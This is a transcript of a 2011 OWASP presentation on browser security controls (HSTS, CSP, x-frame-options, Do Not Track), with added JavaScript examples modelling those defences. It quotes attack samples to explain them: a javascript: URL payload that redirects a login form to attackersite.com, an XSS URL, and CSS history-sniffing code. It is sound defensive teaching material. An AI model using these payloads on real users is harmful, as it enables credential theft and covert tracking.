Enabling Browser Security in Web Applications
Topics:
Locking Down SSL/TLS
Stamping Out Cross Site Scripting
Socio-Technical Attacks
Privacy

Technologies Covered:
HTTP Strict Transport Security, Content Security Policy, X-Frame-Options, Do Not Track

Comments

  • Correct HSTS Spec link: https://tools.ietf.org/html/draft-ietf-websec-strict-transport-sec
Speaker notes (CSP violation report fields)

  • request: the HTTP request line leading to the policy violation; this includes the method, resource path, and HTTP version.
  • request-headers: the HTTP headers that were sent resulting in a violation of the Content Security Policy.
  • blocked-uri: the URI of the resource that was blocked from loading by the Content Security Policy. This is not sent in the case of frame-ancestors violations; in that case, you should assume the blocked URI is the same as the request URI.
  • violated-directive: the name of the policy section that was violated.
  • original-policy: the original policy as specified by the X-Content-Security-Policy HTTP header.

Presentation Transcript

  • Enabling Browser Security in Web Applications
    August 25, 2011
    Michael Coates - Mozilla
    Copyright © The OWASP Foundation. Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License.
    The OWASP Foundation http://www.owasp.org
  • About
    Michael Coates, Senior Manager, Mozilla; Lead of Infrastructure Security Team
    mcoates@mozilla.com
    http://blog.mozilla.com/webappsec/
    http://michael-coates.blogspot.com
    @_mwc
  • Agenda
    Locking Down SSL/TLS
    Stamping Out Cross Site Scripting
    Socio-Technical Attacks
    Privacy
  • Locking Down SSL/TLS (headlines)
    "Fake certificate attack targets Facebook users in Syria" - May 2011, theregister.co.uk
    "How to Hijack Facebook Using Firesheep" - October 2010, pcworld.com
    "Leaked Report: ISP Secretly Added Spy Code To Web Sessions, Crashing Browsers" - June 2008, wired.com
    "Internet traffic was routed via Chinese servers; U.S. military sites included" - November 2010, washingtontimes.com
  • Risks of Insecure Communication
    High likelihood of attack: open wifi, municipal wifi, malicious ISP; easy to exploit.
    High impact to user: clandestine monitoring of a population; injection of incorrect/malicious content.
    No protection from any defensive systems: this is a design flaw in the application itself.
  • Insecure Session Management
    Secure login over HTTPS: the password is submitted encrypted.
    Immediate redirect to HTTP: the session ID is sent in cleartext <-- vulnerability point (the Firesheep attack).
    [Diagram: request https://site.com/login, response sets the session ID cookie; request http://site.com/profile carries the session ID in the clear.]
  • Insecure Redirects
    User requests an HTTP page, the response redirects to HTTPS.
    The 302 response itself is HTTP <-- vulnerability point: an attacker on the path can rewrite the request or the redirect before TLS is ever used.
    [Diagram: GET http://mybank.com/ -> 302 redirect to https://mybank.com/ -> GET https://mybank.com/ -> 200 OK.]
  • Secure Design for Communication
    HTTP Strict Transport Security (HSTS): an opt-in security control; the website instructs a compatible browser to enable STS for the site.
    HSTS forces (for an enabled site): all communication over HTTPS; no insecure HTTP requests sent from the browser; no option for the user to override untrusted certificates.
  • Strict Transport Security
    The browser prevents HTTP requests to an HSTS site; any request to the site is "upgraded" to HTTPS.
    No cleartext HTTP traffic is ever sent to an HSTS site; the browser assumes HTTPS for HSTS sites.
    [Diagram: user enters http://mybank.com/; the browser sends GET https://mybank.com/ -> 200 OK.]
  • Cookie Forcing
    HSTS also protects against cookie forcing.
  • HSTS FAQ
    Is HSTS cert pinning? No.
    Chicken and the egg? Technically yes (the first connection, before the policy is known, is exposed), but with drastically less chance of attack.
    Certificate rotation problem? No - HSTS forces a valid certificate, it doesn't specify which one.
    Browser support, current: Firefox & Chrome. https://www.owasp.org/index.php/HTTP_Strict_Transport_Security#Browser_Support
  • Protecting Outdated Users
    HSTS is supported in current browsers (Firefox, Chrome); older browsers all support the SECURE cookie flag.
    The SECURE cookie flag instructs the browser to only send the cookie over HTTPS.
    Much less (and different) protection than HSTS, but a good defense-in-depth control.
  • Secure Flag
    The SECURE flag doesn't prevent HTTP requests the way HSTS does; it just removes SECURE cookies from the HTTP request.
    [Diagram: the response sets the session ID cookie with the Secure flag; the following http:// request goes out, but without the session ID cookie.]
  • Defensive Design
    HTTP Strict Transport Security: http://tools.ietf.org/html/draft-hodges-strict-transport-sec
    Set the SECURE flag for cookies.
    Secure application design for TLS: https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
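The slides above describe HSTS and the Secure cookie flag in prose. As an added example (not part of the original deck and not Mozilla's code), the JavaScript below models the browser-side rules the two controls impose and runs them against the login-then-redirect-to-HTTP scenario from the Insecure Session Management slide. It assumes a made-up host, site.com, and constructed cookies; the header handling follows the HSTS specification (the header is ignored when received over plain HTTP or on a connection with certificate errors, max-age=0 clears the policy, includeSubDomains extends it to subdomains, an explicit port 80 becomes 443).

```javascript
// Added example, not from the slides: a model of how a browser applies HSTS
// and the Secure cookie flag. Hostnames and cookies below are constructed.

// Parse "max-age=31536000; includeSubDomains". Names are case-insensitive,
// max-age is required, and anything malformed is ignored (returns null).
function parseSts(value) {
  let maxAge = null, includeSubDomains = false;
  for (const part of value.split(';')) {
    const [rawName, rawValue = ''] = part.split('=');
    const name = rawName.trim().toLowerCase();
    if (name === 'max-age') {
      const v = rawValue.trim().replace(/^"|"$/g, '');
      if (!/^\d+$/.test(v)) return null;
      maxAge = Number(v);
    } else if (name === 'includesubdomains') {
      includeSubDomains = true;
    }
  }
  return maxAge === null ? null : { maxAge, includeSubDomains };
}

class HstsStore {
  constructor(now = () => Date.now()) {
    this.now = now;          // injectable clock so expiry can be exercised
    this.hosts = new Map();  // hostname -> { expires, includeSubDomains }
  }
  // Record policy from a response. The header only counts when it arrived over
  // HTTPS without certificate errors; otherwise an on-path attacker could set
  // (or, with max-age=0, clear) the policy. Returns whether it was honoured.
  observeResponse({ url, headers, certificateErrors = false }) {
    const u = new URL(url);
    if (u.protocol !== 'https:' || certificateErrors) return false;
    const raw = headers['strict-transport-security'];
    const sts = raw ? parseSts(raw) : null;
    if (sts === null) return false;
    if (sts.maxAge === 0) {
      this.hosts.delete(u.hostname);
    } else {
      this.hosts.set(u.hostname, {
        expires: this.now() + sts.maxAge * 1000,
        includeSubDomains: sts.includeSubDomains,
      });
    }
    return true;
  }
  // Exact match, or a parent domain whose unexpired policy includes subdomains.
  isKnownHost(hostname) {
    const labels = hostname.toLowerCase().split('.');
    for (let i = 0; i < labels.length; i++) {
      const candidate = labels.slice(i).join('.');
      const entry = this.hosts.get(candidate);
      if (!entry) continue;
      if (entry.expires <= this.now()) { this.hosts.delete(candidate); continue; }
      if (i === 0 || entry.includeSubDomains) return true;
    }
    return false;
  }
  // What the browser actually fetches: http:// to a known host becomes https://
  // before any bytes leave the machine (an explicit :80 becomes :443).
  rewriteRequestUrl(url) {
    const u = new URL(url);
    if (u.protocol !== 'http:' || !this.isKnownHost(u.hostname)) return url;
    u.protocol = 'https:';
    if (u.port === '80') u.port = '443';
    return u.toString();
  }
}

// The Secure flag does not stop the HTTP request; it only keeps flagged cookies
// out of it. This is the request-building step of a simple cookie jar.
function cookieHeaderFor(jar, url) {
  const u = new URL(url);
  const secureChannel = u.protocol === 'https:';
  return jar
    .filter(c => c.host === u.hostname && (secureChannel || !c.secure))
    .map(c => `${c.name}=${c.value}`)
    .join('; ');
}

// The deck's scenario: HTTPS login, then a redirect to http://site.com/profile.
function demo() {
  let clock = 1000000;
  const store = new HstsStore(() => clock);
  const jar = [
    { host: 'site.com', name: 'sessionid', value: 'abc123', secure: true },
    { host: 'site.com', name: 'lang', value: 'en', secure: false },
  ];
  // An attacker answering over plain HTTP cannot clear (or set) the policy.
  const spoofAccepted = store.observeResponse({
    url: 'http://site.com/', headers: { 'strict-transport-security': 'max-age=0' } });
  // The genuine HTTPS login response enables STS for site.com and its subdomains.
  const accepted = store.observeResponse({
    url: 'https://site.com/login',
    headers: { 'strict-transport-security': 'max-age=31536000; includeSubDomains' } });
  const target = 'http://site.com/profile';
  const secureFlagOnly = cookieHeaderFor(jar, target); // HTTP request still sent, session cookie withheld
  const upgraded = store.rewriteRequestUrl(target);    // HSTS: no HTTP request at all
  const cookiesSent = cookieHeaderFor(jar, upgraded);
  const subdomain = store.rewriteRequestUrl('http://mail.site.com:80/inbox');
  clock += (31536000 + 1) * 1000;                      // the policy has now expired
  const afterExpiry = store.rewriteRequestUrl(target);
  return { spoofAccepted, accepted, secureFlagOnly, upgraded, cookiesSent, subdomain, afterExpiry };
}
```

Running demo() with node shows the two controls side by side: with the Secure flag alone the http://site.com/profile request still leaves the browser, carrying only the non-Secure cookie, while HSTS rewrites the URL to https:// before any cookie is attached, and the rewrite also covers mail.site.com because the policy was set with includeSubDomains.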
  • Cross Site Scripting
  • Risks of XSS
    A top web security issue on every OWASP Top 10 (2010, 2007, 2004 editions).
    Impact: the vulnerability allows an attacker to change any aspect of a vulnerable web page.
    Business impact: compromise of user accounts; false data displayed on the website; remote monitoring of user actions with the website; full attacker control of content displayed and served from the website.
  • XSS Example
    (1) Attacker submits malicious code (JavaScript) through a form field.
    (2) The code is now part of the webpage, rendered inside the page's own HTML next to the login form.
    (3) The malicious script submits passwords to the evil site & installs malware.
    (4) Attacker spreads the malicious URL: http://site.com/?a=%3cscript%3edocument%2e
  • Frustrating Problem
    XSS issues can occur anywhere user data is used in a webpage.
    It is difficult to identify all output locations.
    Many frameworks allow design patterns that lead to XSS issues.
  • Content Security Policy (CSP)
    CSP - a new defensive control to eliminate XSS.
    Allows a web site to specify where JavaScript can be loaded from.
    JavaScript injected via XSS is rendered inert.
    Violations & potential XSS attacks are reported to the web site for investigation.
    Example CSP policy (Mozilla's pre-standard header; the standardized header is Content-Security-Policy and its "allow" directive became default-src):
      X-Content-Security-Policy: allow self; img-src self data:
  • XSS Example with CSP
    (1) Attacker submits malicious code (JavaScript).
    (2) CSP prevents script execution: the injected script is still in the page's HTML but does not run.
    (3) The site is safe to use; a violation report is sent to site.com/CSPalert.
  • Implementing CSP
    Some code changes are needed to externalize JavaScript.
    Run CSP in report-only mode to test.
    Enable CSP and protect users with browsers supporting CSP.
    Receive alerts on potential vulnerabilities in the app and quickly address them to protect the remaining users.
  • CSP Violation Reporting
    Violations of the CSP policy are reported to the specified URL; this acts as an XSS intrusion detection system.
      X-Content-Security-Policy: allow self; report-uri http://reportcollector.example.com/collector.cgi
    CSP is supported for only a portion of site users, but the XSS IDS benefits all of them.
    Reported data is from the client - trust accordingly.
  • CSP Violation Reporting
    The report includes: request (HTTP request line), request-headers, blocked-uri, violated-directive, original-policy.
    [Diagram: injected JavaScript blocked; violation report sent to site.com/CSPalert.]
  • CSP Violation Report
    [Screenshot of a violation report]
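The slides say the report-uri endpoint acts as an XSS intrusion detection system and that its data comes from the client. The following is an added example (not from the deck, not Mozilla's code) of a collector that parses a report with the field names listed above while treating every field as untrusted input. The sample report, the size limits and the verdict labels are constructed for the example; modern browsers send the standardized Content-Security-Policy report format, which uses a slightly different field set (document-uri, effective-directive, ...), but the same handling applies.

```javascript
// Added example, not from the slides: a receiver for CSP violation reports that
// treats every field as attacker-controllable client input. Field names are the
// ones the slides list (Mozilla's X-Content-Security-Policy report format); the
// sample report and the limits below are constructed for the demonstration.

const MAX_REPORT_BYTES = 16 * 1024; // the report-uri is a public, unauthenticated endpoint
const MAX_FIELD_LEN = 2048;
const FIELDS = ['request', 'request-headers', 'blocked-uri', 'violated-directive', 'original-policy'];

// request-headers carries the victim's own headers, Cookie included. Redact
// credentials before the report reaches a log file or a database.
function redactSensitiveHeaders(raw) {
  return raw.split(/\r?\n/)
    .map(line => (/^(cookie|authorization|proxy-authorization)\s*:/i.test(line)
      ? line.replace(/:.*$/, ': [redacted]') : line))
    .join('\n');
}

// Coerce to a bounded string with control characters removed, so a crafted
// report cannot inject fake log lines or terminal escapes into IDS output.
function cleanField(value) {
  if (typeof value !== 'string') return '';
  return value.replace(/[\x00-\x1f\x7f]/g, ' ').slice(0, MAX_FIELD_LEN);
}

// Returns a normalized report, or null if the body is oversized, not JSON, or
// names no violated directive (such a report carries no actionable signal).
function parseCspReport(body) {
  if (typeof body !== 'string' || body.length > MAX_REPORT_BYTES) return null;
  let parsed;
  try { parsed = JSON.parse(body); } catch (e) { return null; }
  if (parsed === null || typeof parsed !== 'object') return null;
  // Mozilla wrapped the fields in a "csp-report" object; accept a bare object too.
  const wrapped = parsed['csp-report'];
  const inner = wrapped !== null && typeof wrapped === 'object' ? wrapped : parsed;
  const report = {};
  for (const f of FIELDS) {
    const v = inner[f];
    report[f] = cleanField(f === 'request-headers' && typeof v === 'string' ? redactSensitiveHeaders(v) : v);
  }
  return report['violated-directive'] ? report : null;
}

// Turn a report into an IDS verdict. A refused script load is the XSS signal;
// a violation of the catch-all directive needs a human to look at the request.
function classify(report) {
  const directive = report['violated-directive'].split(/\s+/)[0].toLowerCase();
  let blockedHost = null;
  try { blockedHost = new URL(report['blocked-uri']).hostname; } catch (e) { /* "self", inline, or garbage */ }
  let severity = 'other';
  if (directive === 'script-src') severity = 'possible-xss';
  else if (directive === 'allow' || directive === 'default-src') severity = 'investigate';
  return { severity, directive, blockedHost, requestLine: report.request };
}

// Constructed report: an injected <script src> pointing at an attacker host,
// with the victim's session cookie riding along in request-headers.
function demo() {
  const body = JSON.stringify({
    'csp-report': {
      'request': 'GET /?a=%3cscript%3edocument%2e HTTP/1.1',
      'request-headers': 'Host: site.com\nCookie: sessionid=abc123\nUser-Agent: Mozilla/5.0',
      'blocked-uri': 'http://evil.example/steal.js',
      'violated-directive': 'script-src self',
      'original-policy': 'allow self; report-uri http://site.com/CSPalert',
    },
  });
  const report = parseCspReport(body);
  return {
    report,
    verdict: classify(report),
    notJson: parseCspReport('{not json'),
    oversized: parseCspReport('{"a":"' + 'x'.repeat(MAX_REPORT_BYTES) + '"}'),
  };
}
```

Two points a real collector has to get right are visible here: request-headers contains the victim's own Cookie header, so it is redacted before anything is stored, and size and type checks run before JSON.parse and before any field is logged, because a report-uri endpoint accepts input from anyone, not only from browsers enforcing your policy.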
  • Other CSP Benefits
    Prevent clickjacking via frame-ancestors.
    Control embedded frames via frame-src.
    Control domains for images via img-src.
    Control target domains for XMLHttpRequest via xhr-src.
    Enforce specific protocols (https://*.foo.com).
    Future enhancement to control actions & malicious forms.
  • Protecting Outdated Users
    HTTPOnly mitigates one of the XSS impacts - session hijacking.
    Supported in all recent browsers.
    An easy, opt-in security control to protect users.
    [Diagram: injected JavaScript tries to send Cookie: SessionID to the attacker's site; with HTTPOnly the script cannot read the cookie.]
  • Defensive Design
    CSP is gaining traction, with the potential to solve a pressing web security risk.
    HTTPOnly flag - an easy setting to add an additional layer of defense.
    OWASP XSS Prevention Cheat Sheet: https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
  • Socio-Technical Attacks: "Visual Fraud"
  • ClickJacking
    The attacker includes the victim page in an iframe & overlays an opaque layer.
    The attacker's image and text entice a click and interaction.
    Clicks are registered on the victim site underneath the attacker's overlay.
    The user inadvertently performs an action at the victim site.
  • ClickJacking Example
    [Overlay: "Click the Bouncing Ball". Underneath: "Click to follow Joe", "[ ] Grant Joe full profile access", "Confirm".]
  • ClickJacking Defenses
    x-frame-options header: full solution; compatible with new versions of browsers.
    Frame busting scripts: partial solution; compatible with older browsers.
  • x-frame-options
    An additional header in the HTTP response; instructs the browser to disallow framing. Two options - DENY, SAMEORIGIN.
      HTTP/1.1 200 OK
      Server: Apache-Coyote/1.1
      Content-Type: text/html
      Vary: Accept-Encoding
      Content-Length: 35236
      x-frame-options: DENY

      HTTP/1.1 200 OK
      Server: Apache-Coyote/1.1
      Content-Type: text/html
      Vary: Accept-Encoding
      Content-Length: 35236
      x-frame-options: SAMEORIGIN
  • x-frame-options
    The targeted site is not displayed if framed; an error page is displayed instead.
    Prevents the ClickJacking attack.
    [Diagram: attempted clickjack with the attacker's overlay; x-f-o result: the victim site is not rendered.]
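The x-frame-options slides give the header's two values, and the earlier CSP slide lists frame-ancestors as another way to prevent framing. As an added example (not from the deck), the JavaScript below models how a browser evaluates both against a chain of framing documents, including the nested-frame case and a misspelt header value. The bank, attacker and partner URLs are constructed, and the frame-ancestors matcher implements only a subset of the source grammar ('none', 'self', and host sources with an optional scheme and a leading wildcard label).

```javascript
// Added example, not from the slides: how a browser decides whether a framed
// document may render under x-frame-options, beside the CSP frame-ancestors
// directive the deck mentions. All URLs below are constructed.

// Origin = scheme + host + port, the unit both mechanisms compare.
function originOf(url) {
  const u = new URL(url);
  return `${u.protocol}//${u.host}`;
}

// ancestorUrls lists the framing documents, outermost (top-level) first;
// an empty list means the document is the top-level page itself.
function xfoAllows(headerValue, pageUrl, ancestorUrls) {
  if (ancestorUrls.length === 0) return true;
  const value = headerValue.trim().toUpperCase();
  if (value === 'DENY') return false;
  if (value === 'SAMEORIGIN') {
    // Browsers historically differed on whether SAMEORIGIN checks only the top
    // window or every ancestor; checking every ancestor is the strict reading
    // and closes the double-framing hole.
    const page = originOf(pageUrl);
    return ancestorUrls.every(a => originOf(a) === page);
  }
  // Any other value is unrecognised and the header is ignored: a typo in the
  // header value silently turns the defence off.
  return true;
}

// Subset of the frame-ancestors source grammar: 'self', or a host source with
// an optional scheme and a leading "*." wildcard label.
function sourceMatches(source, ancestorUrl, pageOrigin) {
  if (source === "'self'") return originOf(ancestorUrl) === pageOrigin;
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?([^/:]+)$/i.exec(source);
  if (!m) return false;
  const [, scheme, hostPattern] = m;
  const anc = new URL(ancestorUrl);
  if (scheme && `${scheme.toLowerCase()}:` !== anc.protocol) return false;
  const host = anc.hostname.toLowerCase();
  const pattern = hostPattern.toLowerCase();
  // "*.foo.com" matches a.foo.com but not foo.com itself.
  if (pattern.startsWith('*.')) return host.endsWith(pattern.slice(1));
  return host === pattern;
}

function frameAncestorsAllows(sourceList, pageUrl, ancestorUrls) {
  if (ancestorUrls.length === 0) return true;
  const sources = sourceList.trim().split(/\s+/);
  if (sources.includes("'none'")) return false;
  const page = originOf(pageUrl);
  // Every ancestor in the chain must match some source in the list.
  return ancestorUrls.every(a => sources.some(s => sourceMatches(s, a, page)));
}

function demo() {
  const victim = 'https://bank.example/transfer';
  const ownFrame = ['https://bank.example/dashboard'];
  const attacker = ['http://attacker.example/game'];
  // Double framing: attacker page -> bank page that legitimately frames the victim.
  const nested = ['http://attacker.example/game', 'https://bank.example/dashboard'];
  const partners = "'self' https://*.partner.example";
  return {
    deny: xfoAllows('DENY', victim, ownFrame),
    sameOriginOwn: xfoAllows('SAMEORIGIN', victim, ownFrame),
    sameOriginAttacker: xfoAllows('SAMEORIGIN', victim, attacker),
    sameOriginNested: xfoAllows('SAMEORIGIN', victim, nested),
    typoIgnored: xfoAllows('SAMEORGIN', victim, attacker),
    topLevel: xfoAllows('DENY', victim, []),
    partnerOk: frameAncestorsAllows(partners, victim, ['https://app.partner.example/embed']),
    partnerWrongScheme: frameAncestorsAllows(partners, victim, ['http://app.partner.example/embed']),
    partnerApex: frameAncestorsAllows(partners, victim, ['https://partner.example/embed']),
    attackerBlocked: frameAncestorsAllows(partners, victim, attacker),
    none: frameAncestorsAllows("'none'", victim, ownFrame),
  };
}
```

The typoIgnored case is the one worth remembering when reviewing a deployment: x-frame-options has no "fail closed" behaviour, so a misspelt value is equivalent to not sending the header at all, and a check that only confirms the header is present will not catch it.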
  • Frame Busting Scripts
    JavaScript within the page to detect framing; will either "bust" the frame or not display content.
      <script>
        // If this document is not the top-level window, it is being framed:
        // navigate the top window to this page to escape the frame.
        if (window.top !== window.self) {
          window.top.location = window.self.location;
        }
      </script>
    Not an optimal solution - techniques are available to bypass the defense (the framing page can, for example, suppress the navigation with an onbeforeunload handler or an iframe sandbox).
  • URL Social Engineering
    Lures: "Cool new hidden feature", "Get 10 free gems for your game".
    "Click the square and type the secret combination: ctrl+a, ctrl+c, ctrl+l, ctrl+v and enter."
  • Danger of those keystrokes...
    click square - selects the text element
    ctrl+a - select all text
    ctrl+c - copy text (a javascript: URL)
    ctrl+l - select the location bar
    ctrl+v - paste text
    enter - execute JavaScript
    The pasted text:
      javascript:var xmlHttp = new XMLHttpRequest();
      xmlHttp.open("GET", document.location, false);
      xmlHttp.send();
      var x = xmlHttp.responseText;
      x = x.replace(/somesite\.com/g, "attackersite.com");
      document.writeln(x);
  • URL JavaScript
    The pasted JavaScript has full control of the page: it can rewrite the page and extract and send any data, with no indication to the user.
    [Before: somesite.com login form (username, password, submit). After: the same form, now submitting to attackersite.com.]
  • Defense
    Code change to the browser: remove the association between a javascript: URL entered in the location bar and the loaded document. Renders the attack inert.
  • Privacy (headlines)
    "Your Android Phone is Tracking You" - April 2011, pcworld.com
    "Your iPhone Is Tracking Your Every Move" - April 2011, readwriteweb.com
    "Mobile-App Makers Face U.S. Privacy Investigation" - April 2011, online.wsj.com
    "Nissan car secretly shares driver data with websites" - June 2011, theregister.co.uk
  • Privacy
    Business gains from gathering user data.
    Privacy infringement is based on laws; privacy concerns are based on user expectations.
    Need better options for the user to understand collected data and to control the flow and accessibility of user data.
  • Browser Profiling
    Panopticlick fingerprints the browser based on the information it provides: plugins installed, font support, screen resolution, time zone.
    Sample result: "Your browser fingerprint appears to be unique among the 1,636,839 tested so far. Currently, we estimate that your browser has a fingerprint that conveys at least 20.64 bits of identifying information."
  • CSS History Sniffing
    Determine the user's browsing habits with CSS: a visited link is styled differently than a non-visited link, and CSS plus element inspection determines which pages were visited.
      // Compare the computed link color against the page's own :link / :visited styling.
      if (getComputedStyle(link, "").color == "rgb(0, 0, 128)") {
        // link.href has not been visited
      } else {
        // link.href has been visited
      }
    Issue fixed March 2010: http://dbaron.org/mozilla/visited-privacy
  • Evercookie
    "Its [evercookie] goal is to identify a client even after they've removed standard cookies, Flash cookies (Local Shared Objects or LSOs), and others."
    Multiple methods of storing data on the client; could be abused for unauthorized tracking.
    Goal: keep the user in control of data storage / tracking mechanisms.
    Storage mechanisms used:
      Standard HTTP Cookies
      Local Shared Objects (Flash Cookies)
      Silverlight Isolated Storage
      Storing cookies in RGB values of auto-generated, force-cached PNGs, using the HTML5 Canvas tag to read pixels (cookies) back out
      Storing cookies in Web History
      Storing cookies in HTTP ETags
      Storing cookies in Web cache
      window.name caching
      Internet Explorer userData storage
      HTML5 Session Storage
      HTML5 Local Storage
      HTML5 Global Storage
      HTML5 Database Storage via SQLite
    http://samy.pl/evercookie/
  • Do Not Track
    Adds the header DNT: 1 to all web requests; tells websites the user does not want browsing activity to be tracked.
    http://dnt.mozilla.org/
  • Permission Manager
    Granular management options for user interaction with sites (about:permissions).
    Control: location settings, cookie settings, popup windows, offline storage.
  • Privacy Design
    Privacy controls distinguish applications.
    Design with privacy in mind.
    Growing support for DNT.
  • Closing
    Defense in depth: many new security controls to enhance security.
    Strict Transport Security
    Content Security Policy
    x-frame-options
    Do Not Track
  • Thanks! mcoates@mozilla.com @_mwc